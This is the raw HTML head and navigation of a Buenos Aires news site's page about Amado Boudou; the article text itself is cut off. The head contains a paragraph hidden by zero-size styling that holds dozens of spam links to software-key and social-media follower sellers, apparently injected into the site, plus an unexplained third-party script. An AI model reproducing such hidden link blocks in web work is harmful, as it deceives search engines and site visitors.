<!DOCTYPE html>
<html lang="es-AR">
<head>
	<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<link rel="profile" href="http://gmpg.org/xfn/11">
	<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	<!-- This site is optimized with the Yoast SEO plugin v18.1 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Amado Boudou: “Los movimientos sociales tienen poco que ver con el peronismo” - Baires Para Todos</title>
	<link rel="canonical" href="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/" />
	<meta property="og:locale" content="es_ES" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Amado Boudou: “Los movimientos sociales tienen poco que ver con el peronismo” - Baires Para Todos" />
	<meta property="og:description" content="El ex vicepresidente K dio una charla en el Instituto Patria, recordó el legado económico de Manuel Belgrano y comparó al prócer con Néstor y Cristina Kirchner. El ex vicepresidente de la Nación,&nbsp;Amado Boudou, participó en un homenaje que el&nbsp;Instituto Patria&nbsp;realizó a&nbsp;Manuel Belgrano. Allí, el economista, que se encuentra procesado..." />
	<meta property="og:url" content="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/" />
	<meta property="og:site_name" content="Baires Para Todos" />
	<meta property="article:publisher" content="https://www.facebook.com/baires.paratodos" />
	<meta property="article:published_time" content="2022-06-25T22:28:22+00:00" />
	<meta property="article:modified_time" content="2022-06-25T22:28:29+00:00" />
	<meta property="og:image" content="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2022/06/FWIWvlLWQAIQLij.jpg" />
	<meta property="og:image:width" content="680" />
	<meta property="og:image:height" content="510" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@BairesParaTodos" />
	<meta name="twitter:site" content="@BairesParaTodos" />
	<meta name="twitter:label1" content="Escrito por" />
	<meta name="twitter:data1" content="Vanesa2" />
	<meta name="twitter:label2" content="Tiempo de lectura" />
	<meta name="twitter:data2" content="4 minutos" />
	<script type="application/ld+json" class="yoast-schema-graph">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</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//static.addtoany.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Baires Para Todos &raquo; Feed" href="https://bairesparatodos.com.ar/inicio/feed/" />
<link rel="alternate" type="application/rss+xml" title="Baires Para Todos &raquo; RSS de los comentarios" href="https://bairesparatodos.com.ar/inicio/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Baires Para Todos &raquo; Amado Boudou: “Los movimientos sociales tienen poco que ver con el peronismo” RSS de los comentarios" href="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/bairesparatodos.com.ar\/inicio\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.3"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://bairesparatodos.com.ar/inicio/wp-includes/css/dist/block-library/style.min.css?ver=5.9.3' type='text/css' media='all' />
<style id='wp-block-library-theme-inline-css' type='text/css'>
.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-code>code{font-family:Menlo,Consolas,monaco,monospace;color:#1e1e1e;padding:.8em 1em;border:1px solid #ddd;border-radius:4px}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-group:where(.has-background){padding:1.25em 2.375em}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto;opacity:.4}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{padding:.5em;border:1px solid;word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}
</style>
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='contact-form-7-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.6' type='text/css' media='all' />
<link rel='stylesheet' id='fvp-frontend-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/plugins/featured-video-plus/styles/frontend.css?ver=2.3.3' type='text/css' media='all' />
<link rel='stylesheet' id='pencisc-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/plugins/penci-framework/assets/css/single-shortcode.css?ver=5.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='penci-oswald-css'  href='//fonts.googleapis.com/css?family=Oswald%3A400&#038;ver=5.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='wordpress-popular-posts-css-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css?ver=5.5.1' type='text/css' media='all' />
<link rel='stylesheet' id='penci-font-awesome-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/themes/pennews/css/font-awesome.min.css?ver=4.5.2' type='text/css' media='all' />
<link rel='stylesheet' id='penci-fonts-css'  href='//fonts.googleapis.com/css?family=Roboto%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C700%2C700italic%2C800%2C800italic%7CMukta+Vaani%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C700%2C700italic%2C800%2C800italic%7COswald%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C700%2C700italic%2C800%2C800italic%7CTeko%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C700%2C700italic%2C800%2C800italic%7CKarla%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C700%2C700italic%2C800%2C800italic%3A300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C700%2C700italic%2C800%2C800italic%26subset%3Dcyrillic%2Ccyrillic-ext%2Cgreek%2Cgreek-ext%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='penci-portfolio-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/themes/pennews/css/portfolio.css?ver=6.5.7' type='text/css' media='all' />
<link rel='stylesheet' id='penci-recipe-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/themes/pennews/css/recipe.css?ver=6.5.7' type='text/css' media='all' />
<link rel='stylesheet' id='penci-review-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/themes/pennews/css/review.css?ver=6.5.7' type='text/css' media='all' />
<link rel='stylesheet' id='penci-style-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/themes/pennews/style.css?ver=6.5.7' type='text/css' media='all' />
<style id='penci-style-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='addtoany-css'  href='https://bairesparatodos.com.ar/inicio/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.16' type='text/css' media='all' />
<style id='addtoany-inline-css' type='text/css'>
@media screen and (max-width:980px){
.a2a_floating_style.a2a_vertical_style{display:none;}
}
</style>
<script type='text/javascript' id='addtoany-core-js-before'>
window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={};a2a_localize = {
	Share: "Share",
	Save: "Save",
	Subscribe: "Subscribe",
	Email: "Email",
	Bookmark: "Bookmark",
	ShowAll: "Show all",
	ShowLess: "Show less",
	FindServices: "Find service(s)",
	FindAnyServiceToAddTo: "Instantly find any service to add to",
	PoweredBy: "Powered by",
	ShareViaEmail: "Share via email",
	SubscribeViaEmail: "Subscribe via email",
	BookmarkInYourBrowser: "Bookmark in your browser",
	BookmarkInstructions: "Press Ctrl+D or \u2318+D to bookmark this page",
	AddToYourFavorites: "Add to your favorites",
	SendFromWebOrProgram: "Send from any email address or email program",
	EmailProgram: "Email program",
	More: "More&#8230;",
	ThanksForSharing: "Thanks for sharing!",
	ThanksForFollowing: "Thanks for following!"
};
</script>
<script type='text/javascript' async src='https://static.addtoany.com/menu/page.js' id='addtoany-core-js'></script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' async src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1' id='addtoany-jquery-js'></script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/featured-video-plus/js/jquery.fitvids.min.js?ver=master-2015-08' id='jquery.fitvids-js'></script>
<script type='text/javascript' id='fvp-frontend-js-extra'>
/* <![CDATA[ */
var fvpdata = {"ajaxurl":"https:\/\/bairesparatodos.com.ar\/inicio\/wp-admin\/admin-ajax.php","nonce":"8ea629298c","fitvids":"1","dynamic":"","overlay":"","opacity":"0.75","color":"b","width":"640"};
/* ]]> */
</script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/featured-video-plus/js/frontend.min.js?ver=2.3.3' id='fvp-frontend-js'></script>
<script type='application/json' id='wpp-json'>
{"sampling_active":0,"sampling_rate":100,"ajax_url":"https:\/\/bairesparatodos.com.ar\/inicio\/wp-json\/wordpress-popular-posts\/v1\/popular-posts","api_url":"https:\/\/bairesparatodos.com.ar\/inicio\/wp-json\/wordpress-popular-posts","ID":171813,"token":"2d4a647d8e","lang":0,"debug":0}
</script>
<script type='text/javascript' src='https://bairesparatodos.com.ar/inicio/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.js?ver=5.5.1' id='wpp-js-js'></script>
<script>var pm_tag = 'AdFR2';var pm_pid = "15317-24c907ea";</script>
<script src="//free.rnv.life/js/pub.min.js" async></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://bairesparatodos.com.ar/inicio/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://bairesparatodos.com.ar/inicio/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.9.3" />
<link rel='shortlink' href='https://bairesparatodos.com.ar/inicio/?p=171813' />
<link rel="alternate" type="application/json+oembed" href="https://bairesparatodos.com.ar/inicio/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://bairesparatodos.com.ar/inicio/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&#038;format=xml" />
<script>
var portfolioDataJs = portfolioDataJs || [];
var penciBlocksArray=[];
var PENCILOCALCACHE = {};
		(function () {
				"use strict";
		
				PENCILOCALCACHE = {
					data: {},
					remove: function ( ajaxFilterItem ) {
						delete PENCILOCALCACHE.data[ajaxFilterItem];
					},
					exist: function ( ajaxFilterItem ) {
						return PENCILOCALCACHE.data.hasOwnProperty( ajaxFilterItem ) && PENCILOCALCACHE.data[ajaxFilterItem] !== null;
					},
					get: function ( ajaxFilterItem ) {
						return PENCILOCALCACHE.data[ajaxFilterItem];
					},
					set: function ( ajaxFilterItem, cachedData ) {
						PENCILOCALCACHE.remove( ajaxFilterItem );
						PENCILOCALCACHE.data[ajaxFilterItem] = cachedData;
					}
				};
			}
		)();function penciBlock() {
		    this.atts_json = '';
		    this.content = '';
		}</script>
		<style type="text/css">
																										</style>
				<style type="text/css">
																																													
					</style>
		    <script type="text/javascript">
        function nxsPostToFav(obj){ obj.preventDefault;
            var k = obj.target.split("-"); var nt = k[0]; var ii = k[1];  var pid = k[2];
            var data = {  action:'nxs_snap_aj', nxsact: 'manPost', nt:nt, id: pid, nid: ii, et_load_builder_modules:1, _wpnonce: 'e8432469a6'};
            jQuery('#nxsFavNoticeCnt').html('<p> Posting... </p>'); jQuery('#nxsFavNotice').modal({ fadeDuration: 50 });
            jQuery.post('https://bairesparatodos.com.ar/inicio/wp-admin/admin-ajax.php', data, function(response) { if (response=='') response = 'Message Posted';
                jQuery('#nxsFavNoticeCnt').html('<p> ' + response + '</p>' +'<input type="button"  onclick="jQuery.modal.close();" class="bClose" value="Close" />');
            });
        }
    </script>
<p style="overflow: auto; position: fixed; height: 0pt; width: 0pt">
<a href="https://softhier.com/produkt/windows-10-pro-kaufen/"><strong>windows 10 pro</strong></a>
<a href="https://softhier.com/produkt/office-2019-pro-kaufen/"><strong>office 2019 pro</strong></a>
<a href="https://softhier.com/produkt/office-365-pro-kaufen/"><strong>office 365 pro</strong></a>
<a href="https://softhier.com/produkt/windows-10-home-kaufen/"><strong>windows 10 home</strong></a>
<a href="https://softhier.com/produkt/windows-10-enterprise-kaufen/"><strong>windows 10 enterprise</strong></a>
<a href="https://softhier.com/produkt/office-2019-home-and-business-kaufen/"><strong>office 2019 home and business</strong></a>
<a href="https://softhier.com/produkt/office-2016-pro-kaufen/"><strong>office 2016 pro</strong></a>
<a href="https://softhier.com/produkt/windows-10-education-kaufen/"><strong>windows 10 education</strong></a>
<a href="https://softhier.com/produkt/visio-2019-kaufen/"><strong>visio 2019</strong></a>
<a href="https://softhier.com/produkt/microsoft-project-2019-kaufen/"><strong>microsoft project 2019</strong></a>
<a href="https://softhier.com/produkt/microsoft-project-2016-kaufen/"><strong>microsoft project 2016</strong></a>
<a href="https://softhier.com/produkt/visio-professional-2016-kaufen/"><strong>visio professional 2016</strong></a>
<a href="https://softhier.com/produkt/windows-server-2012-kaufen/"><strong>windows server 2012</strong></a>
<a href="https://softhier.com/produkt/windows-server-2016-kaufen/"><strong>windows server 2016</strong></a>
<a href="https://softhier.com/produkt/windows-server-2019-kaufen/"><strong>windows server 2019</strong></a>
<a href="https://softhier.com/produkt-kategorie/betriebssysteme/"><strong>Betriebssysteme</strong></a>
<a href="https://softhier.com/produkt-kategorie/office-software/"><strong>office software</strong></a>
<a href="https://softhier.com/produkt-kategorie/windows-server/"><strong>windows server</strong></a>
<a href="https://softhier.com/"><strong>https://softhier.com/</strong></a>
<a href="https://takipci33.com/instagram-takipci-satin-al/"><strong>instagram takipçi</strong></a>
<a href="https://takipci33.com/instagram-begeni-satin-al/"><strong>instagram beğeni</strong></a>
<a href="https://takipci33.com/instagram-goruntuleme-satin-al/"><strong>instagram görüntüleme</strong></a>
<a href="https://takipci33.com/instagram-otomatik-begeni-satin-al/"><strong>instagram otomatik beğeni</strong></a>
<a href="https://takipci33.com/facebook-begeni-satin-al/"><strong>facebook beğeni</strong></a>
<a href="https://takipci33.com/facebook-sayfa-begenisi-satin-al/"><strong>facebook sayfa beğenisi</strong></a>
<a href="https://takipci33.com/facebook-takipci-satin-al/"><strong>facebook takipçi</strong></a>
<a href="https://takipci33.com/twitter-takipci-satin-al/"><strong>twitter takipçi</strong></a>
<a href="https://takipci33.com/twitter-begeni-satin-al/"><strong>twitter beğeni</strong></a>
<a href="https://takipci33.com/twitter-retweet-satin-al/"><strong>twitter retweet</strong></a>
<a href="https://takipci33.com/youtube-izlenme-satin-al/"><strong>youtube izlenme</strong></a>
<a href="https://takipci33.com/youtube-abone-satin-al/"><strong>youtube abone</strong></a>
<a href="https://takipci33.com/"><strong>instagram</strong></a>
</p> 
            <style id="wpp-loading-animation-styles">@-webkit-keyframes bgslide{from{background-position-x:0}to{background-position-x:-200%}}@keyframes bgslide{from{background-position-x:0}to{background-position-x:-200%}}.wpp-widget-placeholder,.wpp-widget-block-placeholder{margin:0 auto;width:60px;height:3px;background:#dd3737;background:linear-gradient(90deg,#dd3737 0%,#571313 10%,#dd3737 100%);background-size:200% auto;border-radius:3px;-webkit-animation:bgslide 1s infinite linear;animation:bgslide 1s infinite linear}</style>
            <link rel="pingback" href="https://bairesparatodos.com.ar/inicio/xmlrpc.php"><script type="application/ld+json">{
    "@context": "http:\/\/schema.org\/",
    "@type": "organization",
    "@id": "#organization",
    "logo": {
        "@type": "ImageObject",
        "url": "https:\/\/bairesparatodos.com.ar\/inicio\/wp-content\/uploads\/2017\/09\/baires-e1505139958447.png"
    },
    "url": "https:\/\/bairesparatodos.com.ar\/inicio\/",
    "name": "Baires Para Todos",
    "description": "Bienvenidos"
}</script><script type="application/ld+json">{
    "@context": "http:\/\/schema.org\/",
    "@type": "WebSite",
    "name": "Baires Para Todos",
    "alternateName": "Bienvenidos",
    "url": "https:\/\/bairesparatodos.com.ar\/inicio\/"
}</script><script type="application/ld+json">{
    "@context": "http:\/\/schema.org\/",
    "@type": "WPSideBar",
    "name": "Sidebar Right",
    "alternateName": "Add widgets here to display them on blog and single",
    "url": "https:\/\/bairesparatodos.com.ar\/inicio\/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo"
}</script><script type="application/ld+json">{
    "@context": "http:\/\/schema.org\/",
    "@type": "BlogPosting",
    "headline": "Amado Boudou: \u201cLos movimientos sociales tienen poco que ver con el peronismo\u201d",
    "description": "El ex vicepresidente K dio una charla en el Instituto Patria, record\u00f3 el legado econ\u00f3mico de Manuel Belgrano y compar\u00f3 al pr\u00f3cer con N\u00e9stor y Cristina Kirchner. El ex vicepresidente de la Naci\u00f3n,&nbsp;Amado Boudou, particip\u00f3 en un homenaje que el&nbsp;Instituto Patria&nbsp;realiz\u00f3 a&nbsp;Manuel Belgrano. All\u00ed, el economista, que se encuentra procesado...",
    "datePublished": "2022-06-25",
    "datemodified": "2022-06-25",
    "mainEntityOfPage": "https:\/\/bairesparatodos.com.ar\/inicio\/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo\/",
    "image": {
        "@type": "ImageObject",
        "url": "https:\/\/bairesparatodos.com.ar\/inicio\/wp-content\/uploads\/2022\/06\/FWIWvlLWQAIQLij.jpg",
        "width": 680,
        "height": 510
    },
    "publisher": {
        "@type": "Organization",
        "name": "Baires Para Todos",
        "logo": {
            "@type": "ImageObject",
            "url": "https:\/\/bairesparatodos.com.ar\/inicio\/wp-content\/uploads\/2017\/09\/baires-e1505139958447.png"
        }
    },
    "author": {
        "@type": "Person",
        "@id": "#person-Vanesa2",
        "name": "Vanesa2"
    }
}</script><meta property="fb:app_id" content="348280475330978"><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<style type="text/css" id="custom-background-css">
body.custom-background { background-color: #ffffff; }
</style>
	<link rel="icon" href="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2015/11/cropped-500-32x32.jpg" sizes="32x32" />
<link rel="icon" href="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2015/11/cropped-500-192x192.jpg" sizes="192x192" />
<link rel="apple-touch-icon" href="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2015/11/cropped-500-180x180.jpg" />
<meta name="msapplication-TileImage" content="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2015/11/cropped-500-270x270.jpg" />
<!-- ## NXS/OG ## --><!-- ## NXSOGTAGS ## --><!-- ## NXS/OG ## -->
<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>	<style>
		a.custom-button.pencisc-button {
			background: transparent;
			color: #D3347B;
			border: 2px solid #D3347B;
			line-height: 36px;
			padding: 0 20px;
			font-size: 14px;
			font-weight: bold;
		}
		a.custom-button.pencisc-button:hover {
			background: #D3347B;
			color: #fff;
			border: 2px solid #D3347B;
		}
		a.custom-button.pencisc-button.pencisc-small {
			line-height: 28px;
			font-size: 12px;
		}
		a.custom-button.pencisc-button.pencisc-large {
			line-height: 46px;
			font-size: 18px;
		}
	</style>
</head>

<body class="post-template-default single single-post postid-171813 single-format-standard custom-background wp-custom-logo group-blog header-sticky penci-body-boxed penci_enable_ajaxsearch penci_sticky_content_sidebar two-sidebar penci-single-style-8 wpb-js-composer js-comp-ver-6.1 vc_responsive">

<div id="page" class="site penci-enable-boxed">
	<div class="penci-topbar clearfix style-1">
	<div class="penci-topbar_container penci-container-fluid">

					<div class="penci-topbar__left">
						<div class="topbar_item topbar_weather">
			<i class="penci-weather-icons wi wi-night-cloudy"></i>
			<div class="penci-weather-now">
				<span class="penci-weather-degrees">7.9</span>
				<span class="penci-weather-unit">C</span>
			</div>
			<div class="penci-weather-location">
				<div class="penci-weather-city">Buenos Aires</div>
			</div>
		</div>
		<div class="topbar_item topbar_date">
	25 junio, 2022</div>
<div class="topbar_item topbar__trending penci-block-vc"><span class="headline-title">Lo último</span>	<span class="penci-trending-nav ">
		<a class="penci-slider-prev" href="#"><i class="fa fa-angle-left"></i></a>
		<a class="penci-slider-next" href="#"><i class="fa fa-angle-right"></i></a>
	</span>
<div class="penci-owl-carousel-slider" data-items="1" data-auto="0" data-autotime="4000" data-speed="400" data-loop="0" data-dots="0" data-nav="0" data-autowidth="0" data-vertical="1"><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/">Amado Boudou: “Los movimientos sociales tienen poco&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/la-nueva-sesion-de-fotos-de-larissa-riquelme/">La nueva sesión de fotos de Larissa&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/china-suarez-se-mostro-en-su-mini-luna-de-miel-con-rusherking/">China Suárez se mostró en su mini&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/luciana-salazar-estaria-de-novia-con-el-jugador-nicolas-gonzalez/">Luciana Salazar estaría de novia con el&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/se-mantiene-la-ventaja-de-lula-sobre-bolsonaro-a-100-dias-de-las-elecciones-presidenciales/">Se mantiene la ventaja de Lula sobre&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/emilio-monzo-macri-tiene-muchas-posibilidades-de-volver-si-no-construimos-una-alternativa/">Emilio Monzó: “Macri tiene muchas posibilidades de&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/el-movimiento-evita-prepara-candidatos-propios-a-la-espera-de-una-paso-en-el-frente-de-todos/">El Movimiento Evita prepara candidatos propios a&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/cristina-se-reunio-con-el-ex-funcionario-macrista-carlos-melconian/">Cristina se reunió con el ex funcionario&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/misiones-es-la-primer-provincia-en-identificar-las-areas-claves-para-la-biodiversidad/">Misiones es la primer provincia en identificar&hellip;</a></h3><h3 class="penci__post-title entry-title"><a href="https://bairesparatodos.com.ar/inicio/comienza-en-ee-uu-el-juicio-contra-el-ultimo-fusilador-impune-de-la-masacre-de-trelew/">Comienza en EE.UU el juicio contra el&hellip;</a></h3></div></div>			</div>
			<div class="penci-topbar__right">
				
			</div>
			</div>
</div>
<div class="site-header-wrapper"><div class="header__top header--s3 customizer-width">
	<div class="penci-container-fluid">
		
<div class="site-branding">
	
		<h2><a href="https://bairesparatodos.com.ar/inicio/" class="custom-logo-link" rel="home"><img width="300" height="85" src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2017/09/baires-e1505139958447.png" class="custom-logo" alt="Baires Para Todos" loading="lazy" /></a></h2>
				</div><!-- .site-branding -->
	</div>
</div>
	<header id="masthead" class="site-header site-header__main header--s3" data-height="80" itemscope="itemscope" itemtype="http://schema.org/WPHeader">
	<div class="penci-container-fluid header-content__container">
		<nav id="site-navigation" class="main-navigation penci_disable_padding_menu pencimn-slide_down" itemscope itemtype="http://schema.org/SiteNavigationElement">
	<ul id="menu-menu-1" class="menu"><li id="menu-item-151540" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-151540"><a href="https://bairesparatodos.com.ar/inicio/" itemprop="url">Inicio</a></li>
<li id="menu-item-14" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14"><a href="https://bairesparatodos.com.ar/inicio/category/locales/" itemprop="url">Locales</a></li>
<li id="menu-item-18" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-18"><a href="https://bairesparatodos.com.ar/inicio/category/politica/" itemprop="url">Política</a></li>
<li id="menu-item-11" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11"><a href="https://bairesparatodos.com.ar/inicio/category/economia/" itemprop="url">Economía</a></li>
<li id="menu-item-13" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-13"><a href="https://bairesparatodos.com.ar/inicio/category/internacionales/" itemprop="url">Internacionales</a></li>
<li id="menu-item-9" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9"><a href="https://bairesparatodos.com.ar/inicio/category/deportes/" itemprop="url">Deportes</a></li>
<li id="menu-item-12" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12"><a href="https://bairesparatodos.com.ar/inicio/category/interes-general/" itemprop="url">Interés General</a></li>
<li id="menu-item-19" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-19"><a href="https://bairesparatodos.com.ar/inicio/category/sociales/" itemprop="url">Sociales</a></li>
<li id="menu-item-15" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15"><a href="https://bairesparatodos.com.ar/inicio/category/medios/" itemprop="url">Medios</a></li>
</ul>
</nav><!-- #site-navigation -->
		<div class="header__social-search">
				<div class="header__search" id="top-search">
			<a class="search-click"><i class="fa fa-search"></i></a>
			<div class="show-search">
	<div class="show-search__content">
